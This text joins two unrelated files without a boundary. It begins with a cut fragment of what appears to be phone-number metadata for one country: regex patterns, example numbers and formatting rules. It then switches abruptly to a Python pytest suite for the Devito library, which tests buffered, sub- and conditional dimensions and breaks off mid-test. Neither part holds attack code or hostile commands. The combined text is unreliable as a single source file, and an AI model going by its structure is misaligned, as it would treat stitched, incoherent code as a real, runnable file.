    general_desc=PhoneNumberDesc(national_number_pattern='[23567]\\d{5,7}|[489]\\d{6,8}', possible_number_pattern='\\d{5,9}'),
    fixed_line=PhoneNumberDesc(national_number_pattern='2(?:[0-8]\\d{5,6}|9\\d{4,6})|(?:[36]\\d|5[1-9]|8[1-6]|9[1-7])\\d{5,6}|(?:4(?:[124-7]\\d|3[1-6])|7(?:0[1-9]|[1-9]\\d))\\d{4,5}', possible_number_pattern='\\d{5,8}', example_number='2123456'),
    mobile=PhoneNumberDesc(national_number_pattern='(?:8[7-9]|98)\\d{7}|4(?:3[0789]|8\\d)\\d{5}', possible_number_pattern='\\d{8,9}', example_number='48123456'),
    toll_free=PhoneNumberDesc(national_number_pattern='800\\d{5}', possible_number_pattern='\\d{8}', example_number='80012345'),
    premium_rate=PhoneNumberDesc(national_number_pattern='90\\d{6}', possible_number_pattern='\\d{8}', example_number='90123456'),
    shared_cost=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
    personal_number=PhoneNumberDesc(national_number_pattern='700\\d{5}', possible_number_pattern='\\d{5,9}', example_number='70012345'),
    voip=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
    pager=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
    uan=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
    emergency=PhoneNumberDesc(national_number_pattern='1(?:12|50|6[06])', possible_number_pattern='\\d{3}', example_number='112'),
    voicemail=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
    short_code=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
    standard_rate=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
    no_international_dialling=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
    national_prefix='0',
    national_prefix_for_parsing='0',
    number_format=[NumberFormat(pattern='(2)(\\d{5})', format='\\1 \\2', leading_digits_pattern=['29'], national_prefix_formatting_rule='0\\1'),
        NumberFormat(pattern='(2)(\\d{3})(\\d{3,4})', format='\\1 \\2 \\3', leading_digits_pattern=['2'], national_prefix_formatting_rule='0\\1'),
        NumberFormat(pattern='(\\d{3})(\\d{4})', format='\\1 \\2', leading_digits_pattern=['43[124-7]|70[1-9]'], national_prefix_formatting_rule='0\\1'),
        NumberFormat(pattern='(\\d{3})(\\d{3})(\\d{2})', format='\\1 \\2 \\3', leading_digits_pattern=['43[124-7]|70[1-9]'], national_prefix_formatting_rule='0\\1'),
        NumberFormat(pattern='(\\d{3})(\\d{2})(\\d{3})', format='\\1 \\2 \\3', leading_digits_pattern=['[78]00'], national_prefix_formatting_rule='0\\1'),
        NumberFormat(pattern='(\\d{2})(\\d{3})(\\d{2,3})', format='\\1 \\2 \\3', leading_digits_pattern=['[356]|4[124-7]|7[1-9]|8[1-6]|9[1-7]'], national_prefix_formatting_rule='0\\1'),
        NumberFormat(pattern='(\\d{2})(\\d{3})(\\d{3,4})', format='\\1 \\2 \\3', leading_digits_pattern=['48|8[7-9]|9[08]'], national_prefix_formatting_rule='0\\1')])

from itertools import product

import numpy as np
from sympy import And
import pytest

from conftest import skipif, opts_tiling
from devito import (ConditionalDimension, Grid, Function, TimeFunction, SparseFunction,  # noqa
                    Eq, Operator, Constant, Dimension, SubDimension, switchconfig,
                    SubDomain, Lt, Le, Gt, Ge, Ne, Buffer)
from devito.ir.iet import (Conditional, Expression, Iteration, FindNodes,
                           retrieve_iteration_tree)
from devito.symbolics import indexify, retrieve_functions, IntDiv
from devito.types import Array


class TestBufferedDimension(object):

    def test_multi_buffer(self):
        grid = Grid((3, 3))
        f = TimeFunction(name="f", grid=grid)
        g = TimeFunction(name="g", grid=grid, save=Buffer(7))

        op = Operator([Eq(f.forward, 1), Eq(g, f.forward)])
        op(time_M=3)
        # f looped all time_order buffer and is 1 everywhere
        assert np.allclose(f.data, 1)
        # g looped indices 0 to 3, rest is still 0
        assert np.allclose(g.data[0:4], 1)
        assert np.allclose(g.data[4:], 0)

    def test_multi_buffer_long_time(self):
        grid = Grid((3, 3))
        time = grid.time_dim
        f = TimeFunction(name="f", grid=grid)
        g = TimeFunction(name="g", grid=grid, save=Buffer(7))

        op = Operator([Eq(f.forward, time), Eq(g, time+1)])
        op(time_M=20)
        # f[0] is time=19, f[1] is time=20
        assert np.allclose(f.data[0], 19)
        assert np.allclose(f.data[1], 20)
        # g is time 15 to 21 (loop twice the 7 buffer then 15->21)
        for i in range(7):
            assert np.allclose(g.data[i], 14+i+1)


class TestSubDimension(object):

    @pytest.mark.parametrize('opt', opts_tiling)
    def test_interior(self, opt):
        """
        Tests application of an Operator consisting of a single equation
        over the ``interior`` subdomain.
        """
        grid = Grid(shape=(4, 4, 4))
        x, y, z = grid.dimensions

        interior = grid.interior

        u = TimeFunction(name='u', grid=grid)

        eqn = [Eq(u.forward, u + 2, subdomain=interior)]

        op = Operator(eqn, opt=opt)
        op.apply(time_M=2)
        assert np.all(u.data[1, 1:-1, 1:-1, 1:-1] == 6.)
        assert np.all(u.data[1, :, 0] == 0.)
        assert np.all(u.data[1, :, -1] == 0.)
        assert np.all(u.data[1, :, :, 0] == 0.)
        assert np.all(u.data[1, :, :, -1] == 0.)

    def test_domain_vs_interior(self):
        """
        Tests application of an Operator consisting of two equations, one
        over the whole domain (default), and one over the ``interior`` subdomain.
        """
        grid = Grid(shape=(4, 4, 4))
        x, y, z = grid.dimensions
        t = grid.stepping_dim  # noqa

        interior = grid.interior

        u = TimeFunction(name='u', grid=grid)  # noqa
        eqs = [Eq(u.forward, u + 1),
               Eq(u.forward, u.forward + 2, subdomain=interior)]

        op = Operator(eqs, opt='noop')
        trees = retrieve_iteration_tree(op)
        assert len(trees) == 2

        op.apply(time_M=1)
        assert np.all(u.data[1, 0, :, :] == 1)
        assert np.all(u.data[1, -1, :, :] == 1)
        assert np.all(u.data[1, :, 0, :] == 1)
        assert np.all(u.data[1, :, -1, :] == 1)
        assert np.all(u.data[1, :, :, 0] == 1)
        assert np.all(u.data[1, :, :, -1] == 1)
        assert np.all(u.data[1, 1:3, 1:3, 1:3] == 3)

    @pytest.mark.parametrize('opt', opts_tiling)
    def test_subdim_middle(self, opt):
        """
        Tests that instantiating SubDimensions using the classmethod
        constructors works correctly.
        """
        grid = Grid(shape=(4, 4, 4))
        x, y, z = grid.dimensions
        t = grid.stepping_dim  # noqa

        u = TimeFunction(name='u', grid=grid)  # noqa
        xi = SubDimension.middle(name='xi', parent=x,
                                 thickness_left=1,
                                 thickness_right=1)
        eqs = [Eq(u.forward, u + 1)]
        eqs = [e.subs(x, xi) for e in eqs]

        op = Operator(eqs, opt=opt)

        u.data[:] = 1.0
        op.apply(time_M=1)
        assert np.all(u.data[1, 0, :, :] == 1)
        assert np.all(u.data[1, -1, :, :] == 1)
        assert np.all(u.data[1, 1:3, :, :] == 2)

    def test_symbolic_size(self):
        """Check the symbolic size of all possible SubDimensions is as expected."""
        grid = Grid(shape=(4,))
        x, = grid.dimensions
        thickness = 4

        xleft = SubDimension.left(name='xleft', parent=x, thickness=thickness)
        assert xleft.symbolic_size == xleft.thickness.left[0]

        xi = SubDimension.middle(name='xi', parent=x,
                                 thickness_left=thickness, thickness_right=thickness)
        assert xi.symbolic_size == (x.symbolic_max - x.symbolic_min -
                                    xi.thickness.left[0] - xi.thickness.right[0] + 1)

        xright = SubDimension.right(name='xright', parent=x, thickness=thickness)
        assert xright.symbolic_size == xright.thickness.right[0]

    @pytest.mark.parametrize('opt', opts_tiling)
    def test_bcs(self, opt):
        """
        Tests application of an Operator consisting of multiple equations
        defined over different sub-regions, explicitly created through the
        use of SubDimensions.
        """
        grid = Grid(shape=(20, 20))
        x, y = grid.dimensions
        t = grid.stepping_dim
        thickness = 4

        u = TimeFunction(name='u', save=None, grid=grid, space_order=0, time_order=1)

        xleft = SubDimension.left(name='xleft', parent=x, thickness=thickness)
        xi = SubDimension.middle(name='xi', parent=x,
                                 thickness_left=thickness, thickness_right=thickness)
        xright = SubDimension.right(name='xright', parent=x, thickness=thickness)

        yi = SubDimension.middle(name='yi', parent=y,
                                 thickness_left=thickness, thickness_right=thickness)

        t_in_centre = Eq(u[t+1, xi, yi], 1)
        leftbc = Eq(u[t+1, xleft, yi], u[t+1, xleft+1, yi] + 1)
        rightbc = Eq(u[t+1, xright, yi], u[t+1, xright-1, yi] + 1)

        op = Operator([t_in_centre, leftbc, rightbc], opt=opt)

        op.apply(time_m=1, time_M=1)

        assert np.all(u.data[0, :, 0:thickness] == 0.)
        assert np.all(u.data[0, :, -thickness:] == 0.)
        assert all(np.all(u.data[0, i, thickness:-thickness] == (thickness+1-i))
                   for i in range(thickness))
        assert all(np.all(u.data[0, -i, thickness:-thickness] == (thickness+2-i))
                   for i in range(1, thickness + 1))
        assert np.all(u.data[0, thickness:-thickness, thickness:-thickness] == 1.)

    def test_flow_detection_interior(self):
        """
        Test detection of flow directions when SubDimensions are used
        (in this test they are induced by the ``interior`` subdomain).

        Stencil uses values at new timestep as well as those at previous ones
        This forces an evaluation order onto x.
        Weights are:

               x=0     x=1     x=2     x=3
         t=N    2    ---3
                v   /
         t=N+1  o--+----4

        Flow dependency should traverse x in the negative direction

               x=2     x=3     x=4     x=5      x=6
        t=0             0   --- 0     -- 1    -- 0
                        v  /    v    /   v   /
        t=1            44 -+--- 11 -+--- 2--+ -- 0
        """
        grid = Grid(shape=(10, 10))
        x, y = grid.dimensions

        interior = grid.interior

        u = TimeFunction(name='u', grid=grid, save=10, time_order=1, space_order=0)

        step = Eq(u.forward, 2*u
                  + 3*u.subs(x, x+x.spacing)
                  + 4*u.forward.subs(x, x+x.spacing),
                  subdomain=interior)
        op = Operator(step)

        u.data[0, 5, 5] = 1.0
        op.apply(time_M=0)
        assert u.data[1, 5, 5] == 2
        assert u.data[1, 4, 5] == 11
        assert u.data[1, 3, 5] == 44
        assert u.data[1, 2, 5] == 4*44
        assert u.data[1, 1, 5] == 4*4*44

        # This point isn't updated because of the `interior` selection
        assert u.data[1, 0, 5] == 0

        assert np.all(u.data[1, 6:, :] == 0)
        assert np.all(u.data[1, :, 0:5] == 0)
        assert np.all(u.data[1, :, 6:] == 0)

    @pytest.mark.parametrize('exprs,expected,', [
        # Carried dependence in both /t/ and /x/
        (['Eq(u[t+1, x, y], u[t+1, x-1, y] + u[t, x, y])'], 'y'),
        (['Eq(u[t+1, x, y], u[t+1, x-1, y] + u[t, x, y], subdomain=interior)'], 'i0y'),
        # Carried dependence in both /t/ and /y/
        (['Eq(u[t+1, x, y], u[t+1, x, y-1] + u[t, x, y])'], 'x'),
        (['Eq(u[t+1, x, y], u[t+1, x, y-1] + u[t, x, y], subdomain=interior)'], 'i0x'),
        # Carried dependence in /y/, leading to separate /y/ loops, one
        # going forward, the other backward
        (['Eq(u[t+1, x, y], u[t+1, x, y-1] + u[t, x, y], subdomain=interior)',
          'Eq(u[t+1, x, y], u[t+1, x, y+1] + u[t, x, y], subdomain=interior)'], 'i0x'),
    ])
    def test_iteration_property_parallel(self, exprs, expected):
        """Tests detection of sequental and parallel Iterations when applying
        equations over different subdomains."""
        grid = Grid(shape=(20, 20))
        x, y = grid.dimensions  # noqa
        t = grid.time_dim  # noqa

        interior = grid.interior  # noqa

        u = TimeFunction(name='u', grid=grid, save=10, time_order=1)  # noqa

        # List comprehension would need explicit locals/globals mappings to eval
        for i, e in enumerate(list(exprs)):
            exprs[i] = eval(e)

        op = Operator(exprs, opt='noop')
        iterations = FindNodes(Iteration).visit(op)
        assert all(i.is_Sequential for i in iterations if i.dim.name != expected)
        assert all(i.is_Parallel for i in iterations if i.dim.name == expected)

    @skipif(['device'])
    @pytest.mark.parametrize('exprs,expected,', [
        # All parallel, the innermost Iteration gets vectorized
        (['Eq(u[time, x, yleft], u[time, x, yleft] + 1.)'], ['yleft']),
        # All outers are parallel, carried dependence in `yleft`, so the middle
        # Iteration over `x` gets vectorized
        (['Eq(u[time, x, yleft], u[time, x, yleft+1] + 1.)'], ['x']),
        # Only the middle Iteration is parallel, so no vectorization (the Iteration
        # is left non-vectorised for OpenMP parallelism)
        (['Eq(u[time+1, x, yleft], u[time, x, yleft+1] + u[time+1, x, yleft+1])'], [])
    ])
    def test_iteration_property_vector(self, exprs, expected):
        """Tests detection of vector Iterations when using subdimensions."""
        grid = Grid(shape=(20, 20))
        x, y = grid.dimensions  # noqa
        time = grid.time_dim  # noqa

        # The leftmost 10 elements
        yleft = SubDimension.left(name='yleft', parent=y, thickness=10) # noqa

        u = TimeFunction(name='u', grid=grid, save=10, time_order=0, space_order=1)  # noqa

        # List comprehension would need explicit locals/globals mappings to eval
        for i, e in enumerate(list(exprs)):
            exprs[i] = eval(e)

        op = Operator(exprs, opt='simd')
        iterations = FindNodes(Iteration).visit(op)
        vectorized = [i.dim.name for i in iterations if i.is_Vectorized]
        assert set(vectorized) == set(expected)

    @pytest.mark.parametrize('opt', opts_tiling)
    def test_subdimmiddle_parallel(self, opt):
        """
        Tests application of an Operator consisting of a subdimension
        defined over different sub-regions, explicitly created through the
        use of SubDimensions.
        """
        grid = Grid(shape=(20, 20))
        x, y = grid.dimensions
        t = grid.stepping_dim
        thickness = 4

        u = TimeFunction(name='u', save=None, grid=grid, space_order=0, time_order=1)

        xi = SubDimension.middle(name='xi', parent=x,
                                 thickness_left=thickness, thickness_right=thickness)

        yi = SubDimension.middle(name='yi', parent=y,
                                 thickness_left=thickness, thickness_right=thickness)

        # a 5 point stencil that can be computed in parallel
        centre = Eq(u[t+1, xi, yi], u[t, xi, yi] + u[t, xi-1, yi]
                                    + u[t, xi+1, yi] + u[t, xi, yi-1] + u[t, xi, yi+1])

        u.data[0, 10, 10] = 1.0

        op = Operator([centre], opt=opt)
        print(op.ccode)

        iterations = FindNodes(Iteration).visit(op)
        assert all(i.is_Affine and i.is_Parallel for i in iterations if i.dim in [xi, yi])

        op.apply(time_m=0, time_M=0)

        assert np.all(u.data[1, 9:12, 10] == 1.0)
        assert np.all(u.data[1, 10, 9:12] == 1.0)

        # Other than those, it should all be 0
        u.data[1, 9:12, 10] = 0.0
        u.data[1, 10, 9:12] = 0.0
        assert np.all(u.data[1, :] == 0)

    def test_subdimleft_parallel(self):
        """
        Tests application of an Operator consisting of a subdimension
        defined over different sub-regions, explicitly created through the
        use of SubDimensions.

        This tests that flow direction is not being automatically inferred
        from whether the subdimension is on the left or right boundary.
        """
        grid = Grid(shape=(20, 20))
        x, y = grid.dimensions
        t = grid.stepping_dim
        thickness = 4

        u = TimeFunction(name='u', save=None, grid=grid, space_order=0, time_order=1)

        xl = SubDimension.left(name='xl', parent=x, thickness=thickness)

        yi = SubDimension.middle(name='yi', parent=y,
                                 thickness_left=thickness, thickness_right=thickness)

        # Can be done in parallel
        eq = Eq(u[t+1, xl, yi], u[t, xl, yi] + 1)

        op = Operator([eq])

        iterations = FindNodes(Iteration).visit(op)
        assert all(i.is_Affine and i.is_Parallel for i in iterations if i.dim in [xl, yi])

        op.apply(time_m=0, time_M=0)

        assert np.all(u.data[1, 0:thickness, 0:thickness] == 0)
        assert np.all(u.data[1, 0:thickness, -thickness:] == 0)
        assert np.all(u.data[1, 0:thickness, thickness:-thickness] == 1)
        assert np.all(u.data[1, thickness+1:, :] == 0)

    def test_subdimmiddle_notparallel(self):
        """
        Tests application of an Operator consisting of a subdimension
        defined over different sub-regions, explicitly created through the
        use of SubDimensions.

        Different from ``test_subdimmiddle_parallel`` because an interior
        dimension cannot be evaluated in parallel.
        """
        grid = Grid(shape=(20, 20))
        x, y = grid.dimensions
        t = grid.stepping_dim
        thickness = 4

        u = TimeFunction(name='u', save=None, grid=grid, space_order=0, time_order=1)

        xi = SubDimension.middle(name='xi', parent=x,
                                 thickness_left=thickness, thickness_right=thickness)

        yi = SubDimension.middle(name='yi', parent=y,
                                 thickness_left=thickness, thickness_right=thickness)

        # flow dependencies in x and y which should force serial execution
        # in reverse direction
        centre = Eq(u[t+1, xi, yi], u[t, xi, yi] + u[t+1, xi+1, yi+1])
        u.data[0, 10, 10] = 1.0

        op = Operator([centre])

        iterations = FindNodes(Iteration).visit(op)
        assert all(i.is_Affine and i.is_Sequential for i in iterations if i.dim == xi)
        assert all(i.is_Affine and i.is_Parallel for i in iterations if i.dim == yi)

        op.apply(time_m=0, time_M=0)

        for i in range(4, 11):
            assert u.data[1, i, i] == 1.0
            u.data[1, i, i] = 0.0

        assert np.all(u.data[1, :] == 0)

    def test_subdimleft_notparallel(self):
        """
        Tests application of an Operator consisting of a subdimension
        defined over different sub-regions, explicitly created through the
        use of SubDimensions.

        This tests that flow direction is not being automatically inferred
        from whether the subdimension is on the left or right boundary.
        """
        grid = Grid(shape=(20, 20))
        x, y = grid.dimensions
        t = grid.stepping_dim
        thickness = 4

        u = TimeFunction(name='u', save=None, grid=grid, space_order=1, time_order=0)

        xl = SubDimension.left(name='xl', parent=x, thickness=thickness)

        yi = SubDimension.middle(name='yi', parent=y,
                                 thickness_left=thickness, thickness_right=thickness)

        # Flows inward (i.e. forward) rather than outward
        eq = Eq(u[t+1, xl, yi], u[t+1, xl-1, yi] + 1)

        op = Operator([eq])

        iterations = FindNodes(Iteration).visit(op)
        assert all(i.is_Affine and i.is_Sequential for i in iterations if i.dim == xl)
        assert all(i.is_Affine and i.is_Parallel for i in iterations if i.dim == yi)

        op.apply(time_m=1, time_M=1)

        assert all(np.all(u.data[0, :thickness, thickness+i] == [1, 2, 3, 4])
                   for i in range(12))
        assert np.all(u.data[0, thickness:] == 0)
        assert np.all(u.data[0, :, thickness+12:] == 0)

    def test_subdim_fd(self):
        """
        Test that the FD shortcuts are handled correctly with SubDimensions
        """
        grid = Grid(shape=(20, 20))
        x, y = grid.dimensions

        u = TimeFunction(name='u', save=None, grid=grid, space_order=1, time_order=1)
        u.data[:] = 2.

        # Flows inward (i.e. forward) rather than outward
        eq = [Eq(u.forward, u.dx + u.dy, subdomain=grid.interior)]

        op = Operator(eq)

        op.apply(time_M=0)

        assert np.all(u.data[1, -1, :] == 2.)
        assert np.all(u.data[1, :, 0] == 2.)
        assert np.all(u.data[1, :, -1] == 2.)
        assert np.all(u.data[1, 0, :] == 2.)
        assert np.all(u.data[1, 1:18, 1:18] == 0.)

    def test_arrays_defined_over_subdims(self):
        """
        Check code generation when an Array uses a SubDimension.
        """
        grid = Grid(shape=(3,))
        x, = grid.dimensions
        xi, = grid.interior.dimensions

        f = Function(name='f', grid=grid)
        a = Array(name='a', dimensions=(xi,), dtype=grid.dtype)
        op = Operator([Eq(a[xi], 1), Eq(f, f + a[xi + 1], subdomain=grid.interior)],
                      openmp=False)
        assert len(op.parameters) == 6
        # neither `x_size` nor `xi_size` are expected here
        assert not any(i.name in ('x_size', 'xi_size') for i in op.parameters)
        # Try running it -- regardless of what it will produce, this should run
        # ie, this checks this error isn't raised:
        # "ValueError: No value found for parameter xi_size"
        op()

    @pytest.mark.parametrize('opt', opts_tiling)
    def test_expandingbox_like(self, opt):
        """
        Make sure SubDimensions aren't an obstacle to expanding boxes.
        """
        grid = Grid(shape=(8, 8))
        x, y = grid.dimensions

        u = TimeFunction(name='u', grid=grid)
        xi = SubDimension.middle(name='xi', parent=x, thickness_left=2, thickness_right=2)
        yi = SubDimension.middle(name='yi', parent=y, thickness_left=2, thickness_right=2)

        eqn = Eq(u.forward, u + 1)
        eqn = eqn.subs({x: xi, y: yi})

        op = Operator(eqn, opt=opt)

        op.apply(time=3, x_m=2, x_M=5, y_m=2, y_M=5,
                 xi_ltkn=0, xi_rtkn=0, yi_ltkn=0, yi_rtkn=0)

        assert np.all(u.data[0, 2:-2, 2:-2] == 4.)
        assert np.all(u.data[1, 2:-2, 2:-2] == 3.)
        assert np.all(u.data[:, :2] == 0.)
        assert np.all(u.data[:, -2:] == 0.)
        assert np.all(u.data[:, :, :2] == 0.)
        assert np.all(u.data[:, :, -2:] == 0.)


class TestConditionalDimension(object):

    """
    A collection of tests to check the correct functioning of ConditionalDimensions.
    """

    def test_basic(self):
        nt = 19
        grid = Grid(shape=(11, 11))
        time = grid.time_dim

        u = TimeFunction(name='u', grid=grid)
        assert(grid.stepping_dim in u.indices)

        u2 = TimeFunction(name='u2', grid=grid, save=nt)
        assert(time in u2.indices)

        factor = 4
        time_subsampled = ConditionalDimension('t_sub', parent=time, factor=factor)
        usave = TimeFunction(name='usave', grid=grid, save=(nt+factor-1)//factor,
                             time_dim=time_subsampled)
        assert(time_subsampled in usave.indices)

        eqns = [Eq(u.forward, u + 1.), Eq(u2.forward, u2 + 1.), Eq(usave, u)]
        op = Operator(eqns)
        op.apply(t_M=nt-2)
        assert np.all(np.allclose(u.data[(nt-1) % 3], nt-1))
        assert np.all([np.allclose(u2.data[i], i) for i in range(nt)])
        assert np.all([np.allclose(usave.data[i], i*factor)
                      for i in range((nt+factor-1)//factor)])

    def test_basic_shuffles(self):
        """
        Like ``test_basic``, but with different equation orderings. Nevertheless,
        we assert against the same exact values as in ``test_basic``, since we
        save `u`, not `u.forward`.
        """
        nt = 19
        grid = Grid(shape=(11, 11))
        time = grid.time_dim

        u = TimeFunction(name='u', grid=grid)

        u2 = TimeFunction(name='u2', grid=grid, save=nt)

        factor = 4
        time_subsampled = ConditionalDimension('t_sub', parent=time, factor=factor)
        usave = TimeFunction(name='usave', grid=grid, save=(nt+factor-1)//factor,
                             time_dim=time_subsampled)

        # Shuffle 1
        eqns = [Eq(usave, u), Eq(u.forward, u + 1.), Eq(u2.forward, u2 + 1.)]
        op = Operator(eqns)
        op.apply(t_M=nt-2)
        assert np.all(np.allclose(u.data[(nt-1) % 3], nt-1))
        assert np.all([np.allclose(u2.data[i], i) for i in range(nt)])
        assert np.all([np.allclose(usave.data[i], i*factor)
                      for i in range((nt+factor-1)//factor)])

        # Shuffle 2
        usave.data[:] = 0.
        u.data[:] = 0.
        u2.data[:] = 0.
        eqns = [Eq(u.forward, u + 1.), Eq(usave, u), Eq(u2.forward, u2 + 1.)]
        op = Operator(eqns)
        op.apply(t_M=nt-2)
        assert np.all(np.allclose(u.data[(nt-1) % 3], nt-1))
        assert np.all([np.allclose(u2.data[i], i) for i in range(nt)])
        assert np.all([np.allclose(usave.data[i], i*factor)
                      for i in range((nt+factor-1)//factor)])

    @pytest.mark.parametrize('opt', opts_tiling)
    def test_spacial_subsampling(self, opt):
        """
        Test conditional dimension for the spatial ones.
        This test saves u every two grid points :
        u2[x, y] = u[2*x, 2*y]
        """
        nt = 19
        grid = Grid(shape=(11, 11))
        time = grid.time_dim

        u = TimeFunction(name='u', grid=grid, save=nt)
        assert(grid.time_dim in u.indices)

        # Creates subsampled spatial dimensions and accordine grid
        dims = tuple([ConditionalDimension(d.name+'sub', parent=d, factor=2)
                      for d in u.grid.dimensions])
        grid2 = Grid((6, 6), dimensions=dims, time_dimension=time)
        u2 = TimeFunction(name='u2', grid=grid2, save=nt)
        assert(time in u2.indices)

        eqns = [Eq(u.forward, u + 1.), Eq(u2, u)]
        op = Operator(eqns, opt=opt)
        op.apply(time_M=nt-2)
        # Verify that u2[x,y]= u[2*x, 2*y]
        assert np.allclose(u.data[:-1, 0::2, 0::2], u2.data[:-1, :, :])

    def test_time_subsampling_fd(self):
        nt = 19
        grid = Grid(shape=(11, 11))
        x, y = grid.dimensions
        time = grid.time_dim

        factor = 4
        time_subsampled = ConditionalDimension('t_sub', parent=time, factor=factor)
        usave = TimeFunction(name='usave', grid=grid, save=(nt+factor-1)//factor,
                             time_dim=time_subsampled, time_order=2)

        dx2 = [indexify(i) for i in retrieve_functions(usave.dt2.evaluate)]
        assert dx2 == [usave[time_subsampled - 1, x, y],
                       usave[time_subsampled + 1, x, y],
                       usave[time_subsampled, x, y]]

    def test_issue_1592(self):
        grid = Grid(shape=(11, 11))
        time = grid.time_dim
        time_sub = ConditionalDimension('t_sub', parent=time, factor=2)
        v = TimeFunction(name="v", grid=grid, space_order=4, time_dim=time_sub, save=5)
        w = Function(name="w", grid=grid, space_order=4)
        Operator(Eq(w, v.dx))(time=6)
        op = Operator(Eq(v.forward, v.dx))
        op.apply(time=6)
        exprs = FindNodes(Expression).visit(op)
        assert exprs[-1].expr.lhs.indices[0] == IntDiv(time, 2) + 1

    def test_subsampled_fd(self):
        """
        Test that the FD shortcuts are handled correctly with ConditionalDimensions
        """
        grid = Grid(shape=(11, 11))
        time = grid.time_dim
        # Creates subsampled spatial dimensions and accordine grid
        dims = tuple([ConditionalDimension(d.name+'sub', parent=d, factor=2)
                      for d in grid.dimensions])
        grid2 = Grid((6, 6), dimensions=dims, time_dimension=time)
        u2 = TimeFunction(name='u2', grid=grid2, space_order=2, time_order=1)
        u2.data.fill(2.)
        eqns = [Eq(u2.forward, u2.dx + u2.dy)]
        op = Operator(eqns)
        op.apply(time_M=0, x_M=11, y_M=11)
        # Verify that u2 contains subsampled fd values
        assert np.all(u2.data[0, :, :] == 2.)
        assert np.all(u2.data[1, 0, 0] == 0.)
        assert np.all(u2.data[1, -1, -1] == -20.)
        assert np.all(u2.data[1, 0, -1] == -10.)
        assert np.all(u2.data[1, -1, 0] == -10.)
        assert np.all(u2.data[1, 1:-1, 0] == 0.)
        assert np.all(u2.data[1, 0, 1:-1] == 0.)
        assert np.all(u2.data[1, 1:-1, -1] == -10.)
        assert np.all(u2.data[1, -1, 1:-1] == -10.)
        assert np.all(u2.data[1, 1:4, 1:4] == 0.)

    # This test generates an openmp loop form which makes older gccs upset
    @switchconfig(openmp=False)
    def test_nothing_in_negative(self):
        """Test the case where when the condition is false, there is nothing to do."""
        nt = 4
        grid = Grid(shape=(11, 11))
        time = grid.time_dim

        u = TimeFunction(name='u', save=nt, grid=grid)
        assert(grid.time_dim in u.indices)

        factor = 4
        time_subsampled = ConditionalDimension('t_sub', parent=time, factor=factor)
        usave = TimeFunction(name='usave', grid=grid, save=(nt+factor-1)//factor,
                             time_dim=time_subsampled)
        assert(time_subsampled in usave.indices)

        eqns = [Eq(usave, u)]
        op = Operator(eqns)

        u.data[:] = 1.0
        usave.data[:] = 0.0
        op.apply(time_m=1, time_M=1)
        assert np.allclose(usave.data, 0.0)

        op.apply(time_m=0, time_M=0)
        assert np.allclose(usave.data, 1.0)

    def test_laplace(self):
        grid = Grid(shape=(20, 20, 20))
        x, y, z = grid.dimensions
        time = grid.time_dim
        t = grid.stepping_dim
        tsave = ConditionalDimension(name='tsave', parent=time, factor=2)

        u = TimeFunction(name='u', grid=grid, save=None, time_order=2)
        usave = TimeFunction(name='usave', grid=grid, time_dim=tsave,
                             time_order=0, space_order=0)

        steps = []
        # save of snapshot
        steps.append(Eq(usave, u))
        # standard laplace-like thing
        steps.append(Eq(u[t+1, x, y, z],
                        u[t, x, y, z] - u[t-1, x, y, z]
                        + u[t, x-1, y, z] + u[t, x+1, y, z]
                        + u[t, x, y-1, z] + u[t, x, y+1, z]
                        + u[t, x, y, z-1] + u[t, x, y, z+1]))

        op = Operator(steps)

        u.data[:] = 0.0
        u.data[0, 10, 10, 10] = 1.0
        op.apply(time_m=0, time_M=0)
        assert np.sum(u.data[0, :, :, :]) == 1.0
        assert np.sum(u.data[1, :, :, :]) == 7.0
        assert np.all(usave.data[0, :, :, :] == u.data[0, :, :, :])

    def test_as_expr(self):
        nt = 19
        grid = Grid(shape=(11, 11))
        time = grid.time_dim

        u = TimeFunction(name='u', grid=grid)
        assert(grid.stepping_dim in u.indices)

        u2 = TimeFunction(name='u2', grid=grid, save=nt)
        assert(time in u2.indices)

        factor = 4
        time_subsampled = ConditionalDimension('t_sub', parent=time, factor=factor)
        usave = TimeFunction(name='usave', grid=grid, save=(nt+factor-1)//factor,
                             time_dim=time_subsampled)
        assert(time_subsampled in usave.indices)

        eqns = [Eq(u.forward, u + 1.), Eq(u2.forward, u2 + 1.),
                Eq(usave, time_subsampled * u)]
        op = Operator(eqns)
        op.apply(t=nt-2)
        assert np.all(np.allclose(u.data[(nt-1) % 3], nt-1))
        assert np.all([np.allclose(u2.data[i], i) for i in range(nt)])
        assert np.all([np.allclose(usave.data[i], i*factor*i)
                      for i in range((nt+factor-1)//factor)])

    def test_shifted(self):
        nt = 19
        grid = Grid(shape=(11, 11))
        time = grid.time_dim

        u = TimeFunction(name='u', grid=grid)
        assert(grid.stepping_dim in u.indices)

        u2 = TimeFunction(name='u2', grid=grid, save=nt)
        assert(time in u2.indices)

        factor = 4
        time_subsampled = ConditionalDimension('t_sub', parent=time, factor=factor)
        usave = TimeFunction(name='usave', grid=grid, save=2, time_dim=time_subsampled)
        assert(time_subsampled in usave.indices)

        t_sub_shift = Constant(name='t_sub_shift', dtype=np.int32)

        eqns = [Eq(u.forward, u + 1.), Eq(u2.forward, u2 + 1.),
                Eq(usave.subs(time_subsampled, time_subsampled - t_sub_shift), u)]
        op = Operator(eqns)

        # Starting at time_m=10, so time_subsampled - t_sub_shift is in range
        op.apply(time_m=10, time_M=nt-2, t_sub_shift=3)
        assert np.all(np.allclose(u.data[0], 8))
        assert np.all([np.allclose(u2.data[i], i - 10) for i in range(10, nt)])
        assert np.all([np.allclose(usave.data[i], 2+i*factor) for i in range(2)])

    def test_no_index(self):
        """Test behaviour when the ConditionalDimension is used as a symbol in
        an expression."""
        nt = 19
        grid = Grid(shape=(11, 11))
        time = grid.time_dim

        u = TimeFunction(name='u', grid=grid)
        assert(grid.stepping_dim in u.indices)

        v = Function(name='v', grid=grid)

        factor = 4
        time_subsampled = ConditionalDimension('t_sub', parent=time, factor=factor)

        eqns = [Eq(u.forward, u + 1), Eq(v, v + u*u*time_subsampled)]
        op = Operator(eqns)
        op.apply(t_M=nt-2)
        assert np.all(np.allclose(u.data[(nt-1) % 3], nt-1))
        # expected result is 1024
